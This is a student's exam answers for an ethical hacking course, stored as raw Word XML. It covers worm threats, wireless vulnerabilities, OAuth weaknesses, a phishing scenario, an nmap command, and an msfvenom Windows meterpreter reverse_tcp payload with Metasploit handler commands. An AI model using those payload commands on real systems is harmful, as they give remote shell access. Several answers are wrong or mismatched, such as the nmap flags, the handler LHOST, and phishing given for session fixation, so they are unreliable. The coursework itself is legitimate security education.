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3F28" w14:textId="79C703AB" w:rsidR="002517BC" w:rsidRDefault="002517BC" w:rsidP="002517B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0204677 Lim Zhe Yuan    DCS22104 Fundamentals of Security in Ethical Hacking Jan2022 OFA part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79846DC1" w14:textId="62E4BDFD" w:rsidR="00864723" w:rsidRDefault="00864723" w:rsidP="002517BC"/>
    <w:p w14:paraId="21ED6127" w14:textId="31EAAF9A" w:rsidR="0023400B" w:rsidRPr="003C2586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3C2586">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1) Discuss two security threats of a worm malware. (4 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D453ABB" w14:textId="56D5CA80" w:rsidR="003C2586" w:rsidRDefault="00CA5645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1. </w:t>
      </w:r>
      <w:r w:rsidR="007D4794">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>Virus infection rate is high.</w:t>
      </w:r>
      <w:r w:rsidR="00971459">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Worm malwares spread virus through a network and can infect multiple networks at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC3C9C0" w14:textId="61DC621D" w:rsidR="00CA5645" w:rsidRDefault="00CA5645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</w:t>
      </w:r>
      <w:r w:rsidR="007D4794">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>Difficult to track and stop the virus spread.</w:t>
      </w:r>
      <w:r w:rsidR="00971459">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Worm malwares spreads very fast to multiple networks and is therefore difficult to track back the original source of the virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADF2C3B" w14:textId="77777777" w:rsidR="00CA5645" w:rsidRDefault="00CA5645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AB4E15F" w14:textId="4ACE0D5D" w:rsidR="0023400B" w:rsidRPr="003C2586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3C2586">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2) Explain five security vulnerabilities of using a wireless network. (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE393C8" w14:textId="1A77E556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No physical access required.</w:t>
      </w:r>
      <w:r w:rsidR="00A00E76">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers can remotely access to a wireless network</w:t>
      </w:r>
      <w:r w:rsidR="007E4784">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> without needing to be near the wireless network source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6286BA90" w14:textId="524D7DFB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Unknown network boundary.</w:t>
      </w:r>
      <w:r w:rsidR="00A00E76">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> The exact range of wireless networks is difficult to pinpoint and is unknown to the users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD0091" w14:textId="7E8C6073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Many points of attack as long as within network range.</w:t>
      </w:r>
      <w:r w:rsidR="00A00E76">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> The exact location of attackers is unknown as users can connect wireless networks anywhere as long as within range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F457AD8" w14:textId="1936EDA1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Password retrieval using brute force attacks.</w:t>
      </w:r>
      <w:r w:rsidR="007E4784">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001528E2">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="007E4784">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>asswords can be retrieved if the passwords are weakly set</w:t>
      </w:r>
      <w:r w:rsidR="001528E2">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F00E5F">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>such as using common words, using reversible password and using formatted password</w:t>
      </w:r>
      <w:r w:rsidR="007E4784">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB70D26" w14:textId="3A44A508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5. Insecure or unencrypted wireless networks.</w:t>
      </w:r>
      <w:r w:rsidR="007E4784">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wireless network that are open publicly may be dangerous for users to connect to because no proper security features are set for the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9F20F" w14:textId="77777777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836C8EF" w14:textId="77CA67B8" w:rsidR="0023400B" w:rsidRPr="003C2586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3C2586">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3) Discuss three disadvantages of open authentication (OAuth). (6 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA091A8" w14:textId="20B45A9B" w:rsidR="0023400B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</w:t>
      </w:r>
      <w:r w:rsidR="00BB5D1E">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authenticated sessions may sometimes still be open after</w:t>
      </w:r>
      <w:r w:rsidR="00B13A8F">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidR="00BB5D1E">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B13A8F">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>exit from the session</w:t>
      </w:r>
      <w:r w:rsidR="00BB5D1E">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>. This allows session hijacking to happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23170C82" w14:textId="006DF65C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</w:t>
      </w:r>
      <w:r w:rsidR="00BB5D1E">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> OAuth only authenticates the user a single time. No further authentication is prompted to the user to verify the legitimacy of the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE87C79" w14:textId="013946F2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</w:t>
      </w:r>
      <w:r w:rsidR="00BB5D1E">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00930D8E">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>OAuth uses a authentication code that is reusable and does not expire. Attackers can reuse the code as long as they know it to authorize themselves as a legitimate user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620C431" w14:textId="06CC4436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5618EE7" w14:textId="6AB4121A" w:rsidR="000E480E" w:rsidRDefault="000E480E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92755A6" w14:textId="150D91DB" w:rsidR="000E480E" w:rsidRDefault="000E480E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4A13C26" w14:textId="788D637B" w:rsidR="000E480E" w:rsidRDefault="000E480E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32E522E" w14:textId="03138927" w:rsidR="000E480E" w:rsidRDefault="000E480E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AD6A6FA" w14:textId="77777777" w:rsidR="000E480E" w:rsidRDefault="000E480E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8C76757" w14:textId="51C7F8CC" w:rsidR="0023400B" w:rsidRPr="00203167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03167">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4) Discuss the MOM strategies for a session fixation attack and give a suitable example scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D471D0" w14:textId="4FBA1005" w:rsidR="0023400B" w:rsidRPr="00203167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03167">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(12 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300570DA" w14:textId="32E99F59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3C2586" w14:paraId="3305C4C9" w14:textId="77777777" w:rsidTr="00350997">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AA5AD5C" w14:textId="4BAE1BBA" w:rsidR="003C2586" w:rsidRPr="003C2586" w:rsidRDefault="003C2586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b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C2586">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F876B9" w14:textId="3C28A1D6" w:rsidR="003C2586" w:rsidRPr="003C2586" w:rsidRDefault="003C2586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b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C2586">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/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56EF3D0B" w14:textId="00A4A146" w:rsidR="003C2586" w:rsidRPr="003C2586" w:rsidRDefault="003C2586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  <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C2586">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C2586" w14:paraId="4599DAF0" w14:textId="77777777" w:rsidTr="00350997">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F5B26A3" w14:textId="598923C3" w:rsidR="003C2586" w:rsidRDefault="00CD61EE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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66E63053" w14:textId="6A814DE3" w:rsidR="003C2586" w:rsidRDefault="00350997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Create and send a fake message that contains a website that belongs to the malicious party</w:t>
            </w:r>
            <w:r w:rsidR="00603B29">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
              </w:rPr>
              <w:t xml:space="preserve"> to a victim network</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27D8DCC3" w14:textId="5771E1EA" w:rsidR="003C2586" w:rsidRDefault="00B52FA6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Attacker sends a fake message about </w:t>
            </w:r>
            <w:r w:rsidR="00093347">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
              </w:rPr>
              <w:t xml:space="preserve">a victim winning a lottery and provides a link to a fake Facebook website that requires the user to login </w:t>
            </w:r>
            <w:r w:rsidR="006A7AE4">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
              </w:rPr>
              <w:t xml:space="preserve">again </w:t>
            </w:r>
            <w:r w:rsidR="00093347">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
              </w:rPr>
              <w:t xml:space="preserve">to let users “follow further instruction to claim the </w:t>
            </w:r>
            <w:r w:rsidR="006A7AE4">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
              </w:rPr>
              <w:t>prize</w:t>
            </w:r>
            <w:r w:rsidR="00093347">
              <w:rPr>
                <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
              </w:rPr>
              <w:t>”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C2586" w14:paraId="0B93F1BF" w14:textId="77777777" w:rsidTr="00350997">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A710892" w14:textId="2C004FE8" w:rsidR="003C2586" w:rsidRDefault="00CD61EE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Opportunity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D62ABA6" w14:textId="2CF12856" w:rsidR="003C2586" w:rsidRDefault="00350997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Victim is not aware of the fake website and provide sensitive information for the website.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D5FB447" w14:textId="46320E29" w:rsidR="003C2586" w:rsidRDefault="001C1377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Victim logs into the fake Facebook page by providing their email address and password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C2586" w14:paraId="3151F1B7" w14:textId="77777777" w:rsidTr="00350997">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7029E293" w14:textId="3F8C84CA" w:rsidR="003C2586" w:rsidRDefault="00CD61EE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lastRenderedPageBreak/>
              <w:t>Motive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E60C2E" w14:textId="09F2ACB3" w:rsidR="003C2586" w:rsidRDefault="00350997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Steal and use the credentials provided by the victim to perform session hijacking attack and steal the victim’s account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="416DEE0B" w14:textId="7488BA3A" w:rsidR="003C2586" w:rsidRDefault="00A8269F" w:rsidP="0023400B">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing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Attacker uses the logged email address and password provided by the user and logs into victim’s real Facebook account and tries to use the credential for other websites.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FD53F48" w14:textId="77777777" w:rsidR="003C2586" w:rsidRDefault="003C2586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1E93FBC" w14:textId="77777777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51F000C" w14:textId="4E00DB48" w:rsidR="0023400B" w:rsidRPr="00203167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03167">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5) List five aggressive search parameters can be retrieved using a network enumerator. (5 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52972B80" w14:textId="05A3504D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Open port</w:t>
      </w:r>
      <w:r w:rsidR="00203167">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA67F1" w14:textId="1558F50E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Operating system version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330AD82F" w14:textId="3F671891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Route used to get to the destination</w:t>
      </w:r>
      <w:r w:rsidR="004264DE">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD9DC7" w14:textId="4EC348CD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Time used to get to the destination</w:t>
      </w:r>
      <w:r w:rsidR="004264DE">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF1ED02" w14:textId="7355E47F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5. </w:t>
      </w:r>
      <w:r w:rsidR="00203167">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:r w:rsidR="006C1969">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDABCB" w14:textId="77777777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045B389" w14:textId="3E12986D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6) Write a line of command to perform FIN, PSH, and URG flags scan for service versions in a network at 10.0.2.0/24 using NMAP with verbose information display in the command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D054DF0" w14:textId="77777777" w:rsidR="0023400B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interface (CLI). (5 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090AEF02" w14:textId="5EFC28A9" w:rsidR="00971459" w:rsidRDefault="00971459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nmap -</w:t>
      </w:r>
      <w:r w:rsidR="006C74F8">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="006C74F8">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.0</w:t>
      </w:r>
      <w:r w:rsidR="006949B5">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F554F" w14:textId="77777777" w:rsidR="00CD61EE" w:rsidRDefault="00CD61EE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0D930EB1" w14:textId="77777777" w:rsidR="00CD61EE" w:rsidRDefault="00CD61EE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3F8BA862" w14:textId="13C87DE9" w:rsidR="0023400B" w:rsidRPr="00CD61EE" w:rsidRDefault="0023400B" w:rsidP="002340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CD61EE">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7) Generate a payload for a reverse TCP connection using three-way handshake method at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C599150" w14:textId="7055775D" w:rsidR="002517BC" w:rsidRDefault="0023400B" w:rsidP="0023400B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD61EE">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.223.37. (8 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D10D05" w14:textId="24B17FF6" w:rsidR="00A00E76" w:rsidRPr="00CC3B1F" w:rsidRDefault="00A00E76" w:rsidP="0023400B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3B1F">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve">Assume </w:t>
      </w:r>
      <w:r w:rsidR="00011C46">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3B1F">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00011C46">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>IP = 192.168.20.69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46146880" w14:textId="2CF3446B" w:rsidR="00445190" w:rsidRDefault="00445190" w:rsidP="0023400B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST</w:t>
      </w:r>
      <w:r w:rsidR="00CD61EE">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00011C46">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>192.168.223.37</w:t>
      </w:r>
      <w:r w:rsidR="00CD61EE">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=25565 -f exe &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00C53003">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00CD61EE">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A95993A" w14:textId="7CE947F4" w:rsidR="00CD61EE" w:rsidRDefault="00CD61EE" w:rsidP="0023400B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A58A0" w14:textId="2E83754C" w:rsidR="00CD61EE" w:rsidRDefault="00CD61EE" w:rsidP="0023400B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437BA8E" w14:textId="0C2B10A8" w:rsidR="00CD61EE" w:rsidRDefault="00CD61EE" w:rsidP="0023400B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set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="00011C46">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>192.168.20.69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A3EC3C" w14:textId="654C44C1" w:rsidR="00CD61EE" w:rsidRDefault="00CD61EE" w:rsidP="0023400B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>set LPORT 25565</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F69574" w14:textId="54090BBF" w:rsidR="00203167" w:rsidRDefault="00203167" w:rsidP="0023400B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:cs="ArialMT"/>
        </w:rPr>
        <w:t>exploit -j -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A148D81" w14:textId="77777777" w:rsidR="00203167" w:rsidRPr="002517BC" w:rsidRDefault="00203167" w:rsidP="0023400B"/>
    <w:sectPr w:rsidR="00203167" w:rsidRPr="0025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105F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86481784"/>
    <w:lvl w:ilvl="0" w:tplc="33E0A5F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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1155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BC"/>
    <w:rsid w:val="00011C46"/>
    <w:rsid w:val="00093347"/>
    <w:rsid w:val="000E480E"/>
    <w:rsid w:val="001528E2"/>
    <w:rsid w:val="001C1377"/>
    <w:rsid w:val="00203167"/>
    <w:rsid w:val="0023400B"/>
    <w:rsid w:val="002517BC"/>
    <w:rsid w:val="00350997"/>
    <w:rsid w:val="00374664"/>
    <w:rsid w:val="003C2586"/>
    <w:rsid w:val="004264DE"/>
    <w:rsid w:val="00445190"/>
    <w:rsid w:val="00603B29"/>
    <w:rsid w:val="006949B5"/>
    <w:rsid w:val="006A7AE4"/>
    <w:rsid w:val="006C1969"/>
    <w:rsid w:val="006C74F8"/>
    <w:rsid w:val="007D22C8"/>
    <w:rsid w:val="007D4794"/>
    <w:rsid w:val="007E4784"/>
    <w:rsid w:val="00841E9A"/>
    <w:rsid w:val="00864723"/>
    <w:rsid w:val="00917F86"/>
    <w:rsid w:val="00930D8E"/>
    <w:rsid w:val="00971459"/>
    <w:rsid w:val="00A00E76"/>
    <w:rsid w:val="00A8269F"/>
    <w:rsid w:val="00B13A8F"/>
    <w:rsid w:val="00B52FA6"/>
    <w:rsid w:val="00BB5D1E"/>
    <w:rsid w:val="00C53003"/>
    <w:rsid w:val="00C90F3F"/>
    <w:rsid w:val="00CA5645"/>
    <w:rsid w:val="00CC3B1F"/>
    <w:rsid w:val="00CD61EE"/>
    <w:rsid w:val="00F0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1E15"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DC80776F-2BE1-4DB2-8B87-2BC206F3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7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7BC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002517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33</cp:revision>
  <cp:lastPrinted>2022-04-20T08:04:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-20T06:59:00Z</dcterms:created>
